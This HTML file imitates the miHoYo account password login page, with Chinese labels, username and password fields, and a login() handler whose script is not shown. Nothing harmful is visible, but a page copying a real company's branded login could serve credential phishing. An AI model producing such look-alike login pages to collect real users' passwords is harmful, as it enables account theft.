<!DOCTYPE html>
<html>
    <head>
        <title>米哈游通行证</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <script src="/resource/javascript/config.js"></script>
        <script src="/resource/javascript/social_mihayou.js"></script>
    </head>
    <body>
        <style>
            .btn_1 {
                width: 40%;
                margin: 0px;
                background-color: white;
                border: none;
                outline: none;
                font-size: 18px;
            }
            .in{
                width: 65%;
                height: 35px;
                border: none;
                background-color: white;
                border-bottom: 1px solid rgba(128, 128, 128, 0.267);
                outline: none;
                margin-bottom: 15px;
            }
        </style>
        <div style="width: 100%;height: 80px;"></div>
        <div align="center">
            <div style="width: 90%;">
                <button class="btn_1">验证码登录</button>
                <button class="btn_1" style="font-weight: bold;color: #4ea4dc;border-bottom: 3px solid #4ea4dc;">密码登录</button>
            </div>
            <br />
            <br />
            <input class="in" placeholder="手机号/邮箱" id="username" />
            <input class="in" type="password" placeholder="密码" id="password" />
            <br />
            <br />
            <button onclick="login()" style="width: 60%;height: 40px;background-color: #4ea4dc;color: white;border-radius: 3px;border: none;">登 录</button>
            <br />
            <div style="width: 58%;margin-top: 5px;">
                <div style="float: left;">
                    <a style="color: #4ea4dc;font-size: 12px;">遇到问题?</a>
                </div>
                <div style="float: right;">
                    <a style="color: #4ea4dc;font-size: 12px;">立即注册</a>
                </div>
            </div>
            <br />
            <input type="checkbox" />
            <a style="font-size: 10px;">已阅读并同意<a style="color: #4ea4dc;font-size: 10px;">《米哈游用户协议》《米哈游隐私政策》</a></a>
        </div>
        <div style="position: absolute;bottom: 60px;width: 100%;">
            <div align="center">
                <img src="/resource/image/mihayou.png" style="width: 120px;height: 40px;">

            </div>
        </div>
    </body>
</html>